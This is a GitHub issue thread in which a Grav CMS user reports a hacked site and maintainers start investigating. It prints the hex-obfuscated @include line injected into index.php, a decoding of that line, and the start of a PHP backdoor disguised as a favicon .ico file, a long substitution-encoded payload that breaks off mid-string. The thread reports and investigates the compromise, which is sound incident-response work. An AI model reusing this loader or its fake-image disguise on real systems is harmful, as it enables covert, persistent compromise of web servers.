Major security issues - Githubissues

avxkim commented 6 years ago

Today i've noticed, that someone hijacked my Grav site on a VPS (none of other sites was affected, just Grav). I found they've added this code to my root index.php:

/*07cd0*/

@include "\x2fs\x72v\x2fw\x77w\x2fs\x65r\x6be\x6fr\x67/\x2fn\x6fd\x65_\x6do\x64u\x6ce\x73/\x70a\x74h\x2dr\x6fo\x74-\x72e\x67e\x78/\x66a\x76i\x63o\x6e_\x63e\x615\x656\x2ei\x63o";

/*07cd0*/

How is that possible? I've set correct permissions on files and dirs. Admin plugin has its flaws?

mahagr commented 6 years ago

@heihachi88 Could you please email me (matias@trilby.media, CC andy@trilby.media) with zipped folder of your site?

avxkim commented 6 years ago

sent it already.

mahagr commented 6 years ago

Did you remove the offending line already? Where it was? Did you do anything else to the site?

dimitrilongo commented 6 years ago

For investigation purpose decoded : @include "/srv/www/serkeorg//node_modules/path-root-regex/favicon_cea5e6.ico"; maybe a malware

mahagr commented 6 years ago

Yea, I just cannot find that file in the zip. Can you find it?

It points to a potential vulnerability in node libraries.

avxkim commented 6 years ago

I removed it manually already, the question is how is that possible? Here's contents of that malware file: favicon_cea5e6.ico:

<?php
if (!defined('ALREADY_RUN_1bc29b36f342a82aaf6658785356718'))
{
define('ALREADY_RUN_1bc29b36f342a82aaf6658785356718', 1);

 $lowjgw = 8352; function geaunvl($mlegwah, $iwivfnsvi){$xxqtf = ''; for($i=0; $i < strlen($mlegwah); $i++){$xxqtf .= isset($iwivfnsvi[$mlegwah[$i]]) ? $iwivfnsvi[$mlegwah[$i]] : $mlegwah[$i];}
$lxsiqhofh="rawurl" . "decode";return $lxsiqhofh($xxqtf);}
$edkssedkbz = '%Km%Kl%Km%Kl%fKsws_nEW%I4%IiEggCg_NCv%Ii%Iq%IK2SZZ%Ir%Q0%Km%Kl%fKsws_nEW%I4%IiNCv_Egg'.
'Cgn%Ii%Iq%IKK%Ir%Q0%Km%Kl%fKsws_nEW%I4%IijpH_EHEoBW'.
'sCw_WsjE%Ii%Iq%IKK%Ir%Q0%Km%Kl%fKEggCg_gEYCgWswv%I4K%Ir%Q0%Km%Kl%fKnEW_WsjE_NsjsW%I4K%I'.
'r%Q0%Km%Kl%Km%Kl%Km%Klsa%I4%Ie6EaswE6%I4%IIz7z_cPZ%II%Ir%Ir%Km%Kl%i0%Km%Kl%IK%IK%'.
'IK%IK6EaswE%I4%IIz7z_cPZ%II%Iq%IK%II%Mqw%II%Ir%Q0%Km%Kl%im%Km%Kl%Km%Klsa'.
'%I4%Ie6EaswE6%I4%IIm3kcqUPkV_TczlklUPk%II%Ir%Ir%Km%Kl%i0%Km%Kl%IK%IK%IK%IK6EaswE%I4%IIm3kcqUPkV_Tczl'.
'klUPk%II%Iq%IK%II/%II%Ir%Q0%Km%Kl%im%Km%Kl%Km%Klsa%IK%I4%Ie6EaswE6%I'.
'4%IilZkclmV_kS2_effo4ioaGIQhp4IppasG4gspheGpWsCe4%Ii%Ir%Ir%Km%Kl%i0%K'.
'm%Kl%IK%IK%IK%IK6EaswE%I4%IilZkclmV_kS2_effo4ioaGIQhp4IppasG4g'.
'spheGpWsCe4%Ii%Iq%IKe%Ir%Q0%Km%Kl%Km%Kl%IK%IK%IK%IK%If6pWp%I'.
'K%Qm%IK2SZZ%Q0%Km%Kl%IK%IK%IK%IK%If6pWp_bE9%IK%Qm%IK2SZZ%Q0%Km%Kl%Km%Kl%IK%IK%IK%IK%IfuZP0lZ'.
'T%M0%Iion_pBWA%Ii%Mm%IK%Qm%IK%Iiae6oMKiE-KGKf-faeQ-4aoI-a6QoMoaEr4e4%Ii%Q0%Km%Kl%IK%IK%IK%IKvNC'.
'hpN%IK%Ifon_pBWA%Q0%Km%Kl%Km%Kl%Km%Kl%IK%IK%IK%IKa'.
'BwoWsCw%IKon_hpnEGf_6EoC6E%I4%IfswYBW%Ir%IK%i0%Km%Kl%Km%Kl%IK%IK%IK'.
'%IK%IK%IK%IK%IKsa%IK%I4nWgNEw%I4%IfswYBW%Ir%IK%Qq%IKf%Ir%Km%Kl%IK%IK%I'.
'K%IK%IK%IK%IK%IK%i0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%'.
'IK%IK%IKgEWBgw%IK%II%II%Q0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%im%Km%Kl%Km%Kl%IK%IK%IK%IK%IK%IK%IK%I'.
'K%IfbE9TWg%IK%Qm%IK%IIl0qmcLu73FdZx2PzRkTUSy8XV5pho6EavAs1bNjwCYDgnWBOJH9tKeIQfMG'.
'i4r%I0/%Qm%II%Q0%Km%Kl%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IfbE9n%'.
'IK%Qm%IKnWg_nYNsW%I4%IfbE9TWg%Ir%Q0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IfbE9n%IK%Qm%IKp'.
'ggp9_aNsY%I4%IfbE9n%Ir%Q0%Km%Kl%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%Ifs%IK%Qm%IKK%Q0%Km%Kl%IK%IK%I'.
'K%IK%IK%IK%IK%IK%IfCBWYBW%IK%Qm%IK%II%II%Q0%Km%Kl%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IfswYBW%IK%Qm%I'.
'KYgEv_gEYNpoE%I4%II%ic%M0%Mcl-5p-tK-r%Mq%I0%Mq/%Mq%Qm%Mm%ic%II%Iq'.
'%IK%II%II%Iq%IK%IfswYBW%Ir%Q0%Km%Kl%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK6C%IK%i0%Km%Kl%IK%IK%IK%IK%IK'.
'%IK%IK%IK%IK%IK%IK%IK%IfEwoe%IK%Qm%IK%IfbE9n%M0%IfswYBW%M0%Ifs%I0%I0%'.
'Mm%Mm%Q0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IfEwoI%IK%Qm%IK%IfbE9n%M0%IfswYBW%M0%Ifs%I0%I0%Mm'.
'%Mm%Q0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IfEwoQ%'.
'IK%Qm%IK%IfbE9n%M0%IfswYBW%M0%Ifs%I0%I0%Mm%Mm%Q0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IfEwof%'.
'IK%Qm%IK%IfbE9n%M0%IfswYBW%M0%Ifs%I0%I0%Mm%Mm%Q0%Km%K'.
'l%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IfoAge%IK%Qm%IK%I4%IfEwoe%IK%Qq%Qq%IKI%'.
'Ir%IK%iq%IK%I4%IfEwoI%IK%Qc%Qc%IKf%Ir%Q0%Km%Kl%IK%'.
'IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IfoAgI%IK%Qm%IK%I4%I'.
'4%IfEwoI%IK%IG%IKeM%Ir%IK%Qq%Qq%IKf%Ir%IK%iq%IK%I4%I'.
'fEwoQ%IK%Qc%Qc%IKI%Ir%Q0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IfoAgQ%IK%'.
'Qm%IK%I4%I4%IfEwoQ%IK%IG%IKQ%Ir%IK%Qq%Qq%IKG%Ir%IK%iq%IK%IfEwof%Q0%Km%Kl%IK%IK%IK%IK%IK%IK'.
'%IK%IK%IK%IK%IK%IK%IfCBWYBW%IK%Qm%IK%IfCBWYBW%IK.%IKoAg%I4%IfoAge%Ir%Q0%K'.
'm%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IKsa%IK%I4%IfEwoQ%I'.
'K%Ie%Qm%IKGf%Ir%IK%i0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IfCBWYBW%IK%Qm%IK%IfC'.
'BWYBW%IK.%IKoAg%I4%IfoAgI%Ir%Q0%Km%Kl%IK%IK%IK%IK%IK%IK%'.
'IK%IK%IK%IK%IK%IK%im%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IKsa%IK%I4%'.
'IfEwof%IK%Ie%Qm%IKGf%Ir%IK%i0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IfCBWY'.
'BW%IK%Qm%IK%IfCBWYBW%IK.%IKoAg%I4%IfoAgQ%Ir%Q0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%im%Km%Kl%IK'.
'%IK%IK%IK%IK%IK%IK%IK%im%IKJAsNE%IK%I4%Ifs%IK%Qq%IKnWgNEw%I4%IfswYBW%I'.
'r%Ir%Q0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IKgEWBgw%IK%IfCBWYBW%Q0%Km%Kl%IK%IK%IK%IK%im%Km%Kl%Km%'.
'Kl%IK%IK%IK%IKsa%IK%I4%IeaBwoWsCw_EHsnWn%I4%IiasNE_YBW_oC'.
'wWEwWn%Ii%Ir%Ir%Km%Kl%IK%IK%IK%IK%i0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IKaBwoWsC'.
'w%IKasNE_YBW_oCwWEwWn%I4%Ifw%Iq%IK%If6%Iq%IK%IfaNpv%IK%Qm%IKLpNnE%Ir%Km'.
'%Kl%IK%IK%IK%IK%IK%IK%IK%IK%i0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK'.
'%IK%IfjC6E%IK%Qm%IK%IfaNpv%IK%Qm%Qm%IK4%IK%QL%IK%Iip%Ii%IK%Ql%IK%IiJ%Ii%Q0%Km%'.
'Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%Ifa%IK%Qm%IK%fKaCYEw%I4%Ifw%Iq%IK%IfjC6E%Ir%Q0%Km%'.
'Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IKsa%IK%I4%Ifa%IK%Qm%Q'.
'm%Qm%IKLpNnE%Ir%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%i0%Km%Kl%IK%IK%IK%IK%IK%IK'.
'%IK%IK%IK%IK%IK%IK%IK%IK%IK%IKgEWBgw%IKK%Q0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%'.
'IK%IK%IK%im%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IKENnE%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%'.
'i0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IKsa%IK%I4sn_pggp9%I4%If6%Ir%Ir%IK%If6%IK%Qm%I'.
'KsjYNC6E%I4%If6%Ir%Q0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%I'.
'K%Ifh9WEn_JgsWWEw%IK%Qm%IKaJgsWE%I4%Ifa%Iq%IK%If6%Ir%Q0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%I'.
'K%IK%IK%IK%IKaoNCnE%I4%Ifa%Ir%Q0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IKgEWBgw%IK%'.
'Ifh9WEn_JgsWWEw%Q0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%im%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%im%Km%'.
'Kl%IK%IK%IK%IK%im%Km%Kl%Km%Kl%IK%IK%IK%IKsa%IK%I4%IeaBwoWsCw_EHsnWn%I4%IiasNE_vEW_oCwW'.
'EwWn%Ii%Ir%Ir%Km%Kl%IK%IK%IK%IK%i0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IKaBwoWs'.
'Cw%IKasNE_vEW_oCwWEwWn%I4%IfasNEwpjE%Ir%Km%Kl%IK%IK%IK%IK%IK%IK%'.
'IK%IK%i0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IfaApw6NE%IK%Qm%IKaCYEw%I4%IfasNEwpjE%'.
'Iq%IK%IIg%II%Ir%Q0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%I'.
'K%IfaoCwWEwWn%IK%Qm%IKagEp6%I4%IfaApw6NE%Iq%IKasNEnstE%I4%IfasNEwpjE%Ir%Ir%Q'.
'0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IKaoNCnE%I4%IfaApw6NE%Ir%Q0%Km%Kl%Km%Kl%IK%IK%IK%'.
'IK%IK%IK%IK%IK%IK%IK%IK%IKgEWBgw%IK%IfaoCwWEwWn%Q0%Km%Kl%IK%'.
'IK%IK%IK%IK%IK%IK%IK%im%Km%Kl%IK%IK%IK%IK%im%Km%Kl%IK%IK%IK%IKaBwoWsCw%IK'.
'on_vEW_oBggEwW_asNEYpWA%I4%Ir%Km%Kl%IK%IK%IK%IK%i0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK'.
'gEWBgw%IKWgsj%I4YgEv_gEYNpoE%I4%II/%Mq%I4.%Il%Mq%If/%II%Iq%IK%Ii%Ii%Iq%IK__L3Zc__%Ir%Ir'.
'%Q0%Km%Kl%IK%IK%IK%IK%im%Km%Kl%Km%Kl%IK%IK%IK%IKaBwoWsCw%IKon_'.
'6Eog9YW_YApnE%I4%If6pWp%Iq%IK%IfbE9%Ir%Km%Kl%IK%IK%IK%IK%i0%Km%Kl%IK%IK%IK%IK%I'.
'K%IK%IK%IK%IfCBW_6pWp%IK%Qm%IK%II%II%Q0%Km%Kl%Km%Kl%IK%IK%IK%IK%IK%I'.
'K%IK%IKaCg%IK%I4%Ifs%QmK%Q0%IK%Ifs%QqnWgNEw%I4%If6pWp%Ir%Q0%Ir%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%'.
'i0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IKaCg%IK%I4%I'.
'f1%QmK%Q0%IK%If1%QqnWgNEw%I4%IfbE9%Ir%IK%IG%IG%IK%Ifs%QqnWgNEw%I4%If6pWp%I'.
'r%Q0%IK%If1%I0%I0%Iq%IK%Ifs%I0%I0%Ir%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK'.
'%IK%IK%IK%i0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IfCBW_6pWp%'.
'IK.%Qm%IKoAg%I4Cg6%I4%If6pWp%M0%Ifs%Mm%Ir%IK%Mc%IKCg6%I4%IfbE9%M0%If1%Mm%Ir%Ir%Q0%Km%Kl%'.
'IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%im%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%im%Km%Kl%Km%Kl%IK%IK%IK%IK%I'.
'K%IK%IK%IKgEWBgw%IK%IfCBW_6pWp%Q0%Km%Kl%IK%IK%IK%IK%im%Km%Kl%Km%Kl%IK%IK%IK%IKaBwoWsCw%I'.
'Kon_6Eog9YW%I4%If6pWp%Iq%IK%IfbE9%Ir%Km%Kl%IK%IK%IK%IK%i0%Km%Kl%IK%IK%IK%IK%'.
'IK%IK%IK%IKvNChpN%IK%Ifon_pBWA%Q0%Km%Kl%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IKgEWBgw%IKon_6Eog9'.
'YW_YApnE%I4on_6Eog9YW_YApnE%I4%If6pWp%Iq%IK%IfbE9%Ir%Iq%IK%Ifon_pBWA%Ir%Q0%Km%Kl%'.
'IK%IK%IK%IK%im%Km%Kl%IK%IK%IK%IKaBwoWsCw%IKon_Ewog9YW%I4%If6pWp%Iq%IK%IfbE9%Ir%Km%Kl%IK'.
'%IK%IK%IK%i0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IKvNChpN%IK%If'.
'on_pBWA%Q0%Km%Kl%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IKgEWBgw%IKon_6E'.
'og9YW_YApnE%I4on_6Eog9YW_YApnE%I4%If6pWp%Iq%IK%Ifon_pBWA%'.
'Ir%Iq%IK%IfbE9%Ir%Q0%Km%Kl%IK%IK%IK%IK%im%Km%Kl%Km%Kl%IK%IK%IK%IKaBwoWsCw%IKon'.
'_vEW_YNBvsw_oCwasv%I4%Ir%Km%Kl%IK%IK%IK%IK%i0%Km%Kl%IK%IK%IK%IK%IK%IK%'.
'IK%IK%IfnENa_oCwWEwW%IK%Qm%IK%fKasNE_vEW_oCwWEwWn%I4on_vEW_oBggEwW_asNEYpWA%I4%Ir%Ir%Q0%Km%Kl%Km%'.
'Kl%IK%IK%IK%IK%IK%IK%IK%IK%IfoCwasv_YCn%IK%Qm%IKnWgYCn%I4%IfnE'.
'Na_oCwWEwW%Iq%IKj6M%I4on_vEW_oBggEwW_asNEYpWA%I4%Ir%Ir%Ir%Q0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IKsa%I'.
'K%I4%IfoCwasv_YCn%IK%Ie%Qm%Qm%IKLlZTc%Ir%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%i0%Km%Kl%IK%IK%IK%I'.
'K%IK%IK%IK%IK%IK%IK%IK%IK%IfoCwasv%IK%Qm%IKnBhnWg%I4%IfnENa_oCwWE'.
'wW%Iq%IK%IfoCwasv_YCn%IK%I0%IKQI%Ir%Q0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%'.
'IK%IfYNBvswn%IK%Qm%IK%fKBwnEgspNstE%I4on_6Eog9YW%I4gpJBgN6EoC6E%I4'.
'%IfoCwasv%Ir%Iq%IKj6M%I4on_vEW_oBggEwW_asNEYpWA%I4%Ir%Ir%Ir%Ir%Q0%'.
'Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%im%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IKE'.
'NnE%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%i0%Km%Kl%IK%IK%IK%IK%IK%IK%I'.
'K%IK%IK%IK%IK%IK%IfYNBvswn%IK%Qm%IKlggp9%I4%Ir%Q0%K'.
'm%Kl%IK%IK%IK%IK%IK%IK%IK%IK%im%Km%Kl%Km%Kl%IK%IK%IK%IK%IK%IK'.
'%IK%IKgEWBgw%IK%IfYNBvswn%Q0%Km%Kl%IK%IK%IK%IK%im%Km%Kl%Km%Kl%IK%'.
'IK%IK%IKaBwoWsCw%IKon_nEW_YNBvsw_oCwasv%I4%IfYNBvswn%Ir%Km%Kl%IK%IK%IK%IK%i0%Km%Kl%IK%IK%I'.
'K%IK%IK%IK%IK%IK%IfoCwasv_Ewo%IK%Qm%IKgpJBgNEwoC6E%I4on_Ewog9YW%I4%fKnEgspNstE%I4%IfYNBvswn%Ir%Iq'.
'%IKj6M%I4on_vEW_oBggEwW_asNEYpWA%I4%Ir%Ir%Ir%Ir%Q0%Km%Kl%IK%IK%'.
'IK%IK%IK%IK%IK%IK%IfnENa_oCwWEwW%IK%Qm%IK%fKasNE_vEW_oCwWEwWn%I4on_vEW_oBggEwW_asN'.
'EYpWA%I4%Ir%Ir%Q0%Km%Kl%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IfoCwasv_YCn%IK%Qm%IKnWgYCn%I4%IfnENa_oCwWEw'.
'W%Iq%IKj6M%I4on_vEW_oBggEwW_asNEYpWA%I4%Ir%Ir%Ir%Q0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IKsa%IK%I4%I'.
'foCwasv_YCn%IK%Ie%Qm%Qm%IKLlZTc%Ir%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%i0%Km%Kl%IK%IK%IK%I'.
'K%IK%IK%IK%IK%IK%IK%IK%IK%IfoCwasv_CN6%IK%Qm%IKnBhnWg%I4%IfnENa_oCwWEwW%Iq%IK%'.
'IfoCwasv_YCn%IK%I0%IKQI%Ir%Q0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IfnENa_oCwWEwW%'.
'IK%Qm%IKnWg_gEYNpoE%I4%IfoCwasv_CN6%Iq%IK%IfoCwasv_E'.
'wo%Iq%IK%IfnENa_oCwWEwW%Ir%Q0%Km%Kl%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%im%Km%Kl%IK%IK%IK%IK%IK'.
'%IK%IK%IKENnE%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%i0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%I'.
'K%IfnENa_oCwWEwW%IK%Qm%IK%IfnENa_oCwWEwW%IK.%IK%II%Mqw%Mqw//%II%IK.%IKj6M%I4on_vEW_oBggEwW_'.
'asNEYpWA%I4%Ir%Ir%IK.%IK%IfoCwasv_Ewo%Q0%Km%Kl%IK%IK%IK%I'.
'K%IK%IK%IK%IK%im%Km%Kl%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%'.
'fKasNE_YBW_oCwWEwWn%I4on_vEW_oBggEwW_asNEYpWA%I4%Ir%Iq%IK%IfnENa_oCwWEwW%Ir%Q0%Km%Kl%IK%IK%IK%IK%'.
'im%Km%Kl%Km%Kl%IK%IK%IK%IKaBwoWsCw%IKon_YNBvsw_p66%I4%IfwpjE%Iq%IK%IfhpnEGf_6pWp'.
'%Ir%Km%Kl%IK%IK%IK%IK%i0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IfYNBvswn%IK%Qm%IKon_'.
'vEW_YNBvsw_oCwasv%I4%Ir%Q0%Km%Kl%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IfYNBvswn%M0%IfwpjE%Mm%IK%Qm%'.
'IKon_hpnEGf_6EoC6E%I4%IfhpnEGf_6pWp%Ir%Q0%Km%Kl%Km%Kl%IK%IK%IK%IK%IK%IK'.
'%IK%IKon_nEW_YNBvsw_oCwasv%I4%IfYNBvswn%Ir%Q0%Km%Kl%IK%IK%IK%I'.
'K%im%Km%Kl%Km%Kl%IK%IK%IK%IKaBwoWsCw%IKon_YNBvsw_gEj'.
'%I4%IfwpjE%Ir%Km%Kl%IK%IK%IK%IK%i0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IfYNBvswn%IK%Qm%IKon_vEW_YN'.
'Bvsw_oCwasv%I4%Ir%Q0%Km%Kl%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IKBwnEW%I4%IfYNBvswn%M0%IfwpjE%M'.
'm%Ir%Q0%Km%Kl%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IKon_nEW_YNBvsw_oCwasv%I4%IfYNBvswn%Ir%Q0%Km%Kl%IK%IK%'.
'IK%IK%im%Km%Kl%Km%Kl%IK%IK%IK%IKaBwoWsCw%IKon_YNBvsw_NCp'.
'6%I4%IfwpjE%Qm2SZZ%Ir%Km%Kl%IK%IK%IK%IK%i0%Km%Kl%IK%IK%IK%IK%IK%IK'.
'%IK%IKaCgEpoA%IK%I4on_vEW_YNBvsw_oCwasv%I4%Ir%IKpn%I'.
'K%IfYwpjE%Qm%Qc%IfYoCwWEwW%Ir%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%i0%Km%Kl%IK%IK%IK%IK%'.
'IK%IK%IK%IK%IK%IK%IK%IKsa%IK%I4%IfwpjE%Ir%Km%Kl%IK'.
'%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%i0%Km%Kl%IK%IK%I'.
'K%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IKsa%IK%I4nWgojY%I4%IfwpjE%Iq%IK%IfYwpjE%Ir%IK%'.
'Qm%Qm%IKK%Ir%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%i0%K'.
'm%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IKEOpN%I4%IfYoCwWEwW%Ir%Q0%'.
'Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%I'.
'K%IK%IKhgEpb%Q0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%im%Km%Kl%IK%IK%IK%IK%IK%IK%IK'.
'%IK%IK%IK%IK%IK%im%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IKENnE%Km%Kl%IK%IK%'.
'IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%i0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IKEOpN%I4%IfY'.
'oCwWEwW%Ir%Q0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%im%Km%Kl%IK%IK%'.
'IK%IK%IK%IK%IK%IK%im%Km%Kl%IK%IK%IK%IK%im%Km%Kl%Km%Kl%IK%IK%IK%IKaCgEpoA%IK%I4pggp9_jEgvE%I4%If_qPP'.
'd3c%Iq%IK%If_zPTU%Ir%IKpn%IK%If6pWp_bE9%IK%Qm%Qc%IK%If6pWp%Ir%Km%Kl%IK%IK%IK%IK%i0%Km%Kl%IK%I'.
'K%IK%IK%IK%IK%IK%IK%If6pWp%IK%Qm%IK%fKBwnEgspNstE%I4on_6Eog9YW%I4on_hpnEGf_6EoC6E%I4%If6pWp'.
'%Ir%Iq%IK%If6pWp_bE9%Ir%Ir%Q0%Km%Kl%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IKsa%IK%I4snnEW%I4%If6pWp%M0%Iip'.
'b%Ii%Mm%Ir%IK%IG%IG%IK%Ifon_pBWA%Qm%Qm%If6pWp%M0%Iipb%Ii%'.
'Mm%Ir%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%i0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IKsa%IK%I4%If6p'.
'Wp%M0%Iip%Ii%Mm%IK%Qm%Qm%IK%Iis%Ii%Ir%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK'.
'%i0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%Ifs%IK%Qm%IKlggp9%I4%Km%'.
'Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IiYO%'.
'Ii%IK%Qm%Qc%IK%fKYAYOEgnsCw%I4%Ir%Iq%Km%Kl%IK%IK%IK%IK%IK%IK'.
'%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IinO%Ii%IK%Q'.
'm%Qc%IK%IiI.K-e%Ii%Iq%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%'.
'IK%IK%IK%IK%IK%IK%Iipb%Ii%IK%Qm%Qc%IK%If6pWp%M0%Iipb%Ii%Mm%Iq%Km%'.
'Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%Ir%Q0%Km%Kl%I'.
'K%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IKEoAC%IK%fKnEgspNstE%I4%Ifs%Ir'.
'%Q0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IKEHsW%Q0%Km%K'.
'l%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%im%Km%Kl%IK%IK%IK%IK'.
'%IK%IK%IK%IK%IK%IK%IK%IKENnEsa%IK%I4%If6pWp%M0%Iip%Ii%Mm%IK%'.
'Qm%Qm%IK%IiE%Ii%Ir%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%i0%Km%Kl%IK%IK%IK%IK%IK%I'.
'K%IK%IK%IK%IK%IK%IK%IK%IK%IK%IKEOpN%I4%If6pWp%M0%Ii6%Ii%M'.
'm%Ir%Q0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%im%Km%Kl%IK%IK%IK%IK%IK%IK%I'.
'K%IK%IK%IK%IK%IKENnEsa%IK%I4%If6pWp%M0%Iip%Ii%Mm%IK%Qm%Qm%IK%IiYNBvsw%Ii%Ir%Km%Kl%IK%IK%I'.
'K%IK%IK%IK%IK%IK%IK%IK%IK%IK%i0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK'.
'%IK%IK%IK%IK%IK%IK%IKsa%I4%If6pWp%M0%Iinp%Ii%Mm%IK%Qm%Qm%IK%Iip66%Ii%Ir%K'.
'm%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%i0%Km%Kl%IK%IK%IK%IK%IK'.
'%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IKon_YNBv'.
'sw_p66%I4%If6pWp%M0%IiY%Ii%Mm%Iq%IK%If6pWp%M0%Ii6%Ii%Mm%Ir%Q0%Km%Kl%'.
'IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%im%Km%Kl%IK%I'.
'K%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IKENnEsa%I4%If6pWp%M0%Iinp%Ii%Mm'.
'%IK%Qm%Qm%IK%IigEj%Ii%Ir%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%'.
'IK%IK%IK%IK%IK%IK%IK%IK%i0%Km%Kl%IK%IK%IK%IK%IK%IK'.
